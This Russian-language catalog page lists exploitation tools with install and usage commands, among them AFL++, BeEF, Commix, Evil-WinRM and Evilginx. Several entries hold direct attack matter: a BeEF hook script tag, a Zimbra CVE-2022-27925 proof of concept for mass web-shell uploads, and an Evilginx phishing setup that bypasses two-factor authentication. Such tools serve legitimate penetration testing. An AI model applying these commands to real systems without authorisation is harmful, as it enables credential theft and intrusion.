Exploitation

56 инструментов

AFL++

v5.02c
Exploitation

Продвинутый фаззер для поиска уязвимостей в бинарных программах методом покрытия кода. Форк и улучшение AFL: QEMU-режим (без исходников), persistent mode, laf-intel, CmpLog, MOpt мутации, параллельный фаззинг. Один из …

# Ubuntu/Kali: sudo apt install afl++ # Или из исходников (для последних фич): git clone https://github.com/AFLplusplus/AFLplusplus cd AFLplusplus make distrib sudo make install # Компиляция цели с инструментацией: CC=afl-clang-fast ./configure make # Запуск фаззинга: afl-fuzz -i input/ -o output/ -- ./target_binary @@ # QEMU-режим (без исходников): afl-fuzz -i input/ -o output/ -Q -- ./target_binary @@

Amatsumara

v2.9.1
Exploitation

Фреймворк для пентестинга на Rust с динамической загрузкой модулей через C FFI. Модули — нативные `.so`-библиотеки: добавить новую возможность = скопировать файл в директорию модулей. Содержит 8 exploit-модулей, …

# Требования: Rust 1.70+, Linux x86_64 git clone https://codeberg.org/lorsupra/Amatsumara.git cd Amatsumara cargo build --release # Запуск консоли ./target/release/amatsumara-console # Основные команды REPL: # search <term> -- поиск модулей (по имени, типу, CVE) # search cve:CVE-2024-45337 -- поиск по CVE # use exploit/module-slug -- загрузить модуль # set LHOST 192.168.1.100 -- установить опцию (auto-detect tun0/tap0) # set LPORT 4444 # run -- выполнить # run -j -- в фоне (background job) # sessions -- список сессий # sessions -i 1 -- interact с сессией #1 # Экспорт каталога модулей (JSON) ./target/release/amatsumara-console --list-modules --json | jq '.[].slug'

BeEF

v0.6.0.0
Exploitation

Browser Exploitation Framework — фреймворк для атак через XSS-хук на браузер. После внедрения JS-агента: сбор информации, атаки на внутреннюю сеть, социальная инженерия в браузере, эксплуатация расширений. 300+ модулей …

# Kali Linux (предустановлен): sudo beef-xss # Из исходников: git clone https://github.com/beefproject/beef cd beef bundle install sudo ./beef # Интерфейс: http://127.0.0.1:3000/ui/panel # Хук: <script src="http://yourip:3000/hook.js"></script>

Binwalk

v3.1.0
Exploitation

Инструмент для анализа прошивок (firmware): обнаруживает и извлекает встроенные файловые системы, архивы и исполняемый код. Поддерживает рекурсивную распаковку. Широко применяется в hardware hacking, IoT security и CTF.

# Kali Linux / Ubuntu (v2, stable): sudo apt install binwalk # Из исходников (актуальная версия): git clone https://github.com/ReFirmLabs/binwalk cd binwalk pip3 install . binwalk firmware.bin # анализ binwalk -e firmware.bin # извлечение binwalk -Me firmware.bin # рекурсивная распаковка binwalk -A firmware.bin # поиск CPU-архитектур

Boofuzz

v0.4.2
Exploitation

Python-фреймворк для сетевого фаззинга — преемник Sulley. Фаззинг произвольных сетевых протоколов: TCP, UDP, SSH, FTP, HTTP, промышленные протоколы (Modbus, DNP3) и другие. Поддерживает мониторинг краша, web-интерфейс для отслеживания …

pip3 install boofuzz # Из исходников: git clone https://github.com/jtpereyda/boofuzz cd boofuzz pip3 install . # Минимальный пример фаззинга HTTP: from boofuzz import * session = Session(target=Target(connection=TCPSocketConnection("127.0.0.1", 80))) s_initialize("HTTP GET") s_string("GET") s_delim(" ") s_string("/") s_static(" HTTP/1.1\r\n\r\n") session.connect(s_get("HTTP GET")) session.fuzz()

Burp Suite

Exploitation ★ featured Партнёр

Профессиональная платформа для тестирования безопасности веб-приложений. Proxy для перехвата трафика, Scanner, Intruder (фаззинг/брутфорс), Repeater, Decoder, Sequencer, Collaborator. Community Edition — бесплатна и покрывает большинство задач. Professional ($449/год) добавляет …

# Скачать JAR / установщик с официального сайта # https://portswigger.net/burp/communitydownload # Kali Linux (предустановлен) burpsuite # Запуск из JAR java -jar burpsuite_community_vX.X.X.jar
Exploitation

PoC-эксплойт для Zimbra Collaboration Suite RCE (CVE-2022-27925), часть hgrab-framework. Массово атакует список целей: находит форму входа Zimbra Web Client, эксплуатирует уязвимость загрузки веб-шелла через уязвимый mboximport-эндпоинт и выполняет …

git clone https://git.toolsofthetrade.qzz.io/recovered/cve-2022-27925.git cd cve-2022-27925 python3 main.py <list.txt> <output> "<command>" # list.txt: список целей вида http(s)://host:port

Chisel

v1.11.7
Exploitation

Быстрый TCP/UDP туннель через HTTP, защищённый SSH. Написан на Go. Используется для пивотинга — проброса трафика через скомпрометированный хост к недоступным сегментам сети. Один бинарник работает и как …

# Go install go install github.com/jpillora/chisel@latest # Готовые бинарники (Linux, Windows, macOS, ARM) # https://github.com/jpillora/chisel/releases # Из исходников git clone https://github.com/jpillora/chisel cd chisel && go build .

Commix

v4.1
Exploitation

Автоматизированный инструмент для обнаружения и эксплуатации command injection. Работает с GET/POST, HTTP-заголовками и cookies. Поддерживает blind/time-based, классические и файловые техники инъекций. Входит в Kali Linux.

# Kali Linux (предустановлен): commix --url "http://target.com/vuln.php?param=test" # Из исходников: git clone https://github.com/commixproject/commix cd commix python3 commix.py --url "http://target.com/vuln.php?param=test" # POST: python3 commix.py --url "http://target.com/" --data "param=test" # Заголовок: python3 commix.py --url "http://target.com/" -H "X-Forwarded-For: test*"

Dalfox

v3.1.2
Exploitation

Быстрый и полностью открытый сканер XSS-уязвимостей, заточенный под автоматизацию: встраивается в CI/CD и bug bounty пайплайны, анализирует параметры, DOM-контекст и применяет умную фильтрацию ложных срабатываний. Активно развивается, широко …

go install github.com/hahwul/dalfox/v2@latest dalfox url https://target.example.com/page?param=test dalfox file urls.txt --silence

Evil-WinRM

v3.9
Exploitation

Продвинутый WinRM shell для пентеста Windows-систем. Работает через протокол Windows Remote Management (порт 5985/5986). Возможности: • Upload/download файлов • Загрузка и выполнение PowerShell скриптов в памяти • Загрузка …

# gem (Ruby) gem install evil-winrm # Kali Linux apt install evil-winrm # Из исходников git clone https://github.com/Hackplayers/evil-winrm cd evil-winrm && gem install bundler bundle install && ruby evil-winrm.rb

Evilginx

v3.3.0
Exploitation

MITM-фреймворк для фишинга с обходом двухфакторной аутентификации. Перехватывает не только пароли, но и сессионные куки — позволяет войти в аккаунт даже при включённом 2FA. Поддерживает кастомные phishlets для …

# Сборка из исходников (Go 1.18+): git clone https://github.com/kgretzky/evilginx2 cd evilginx2 make # Запуск (требует домен и порты 80/443): sudo ./evilginx > config domain yourdomain.com > config ipv4 1.2.3.4 > phishlets hostname o365 login.yourdomain.com > phishlets enable o365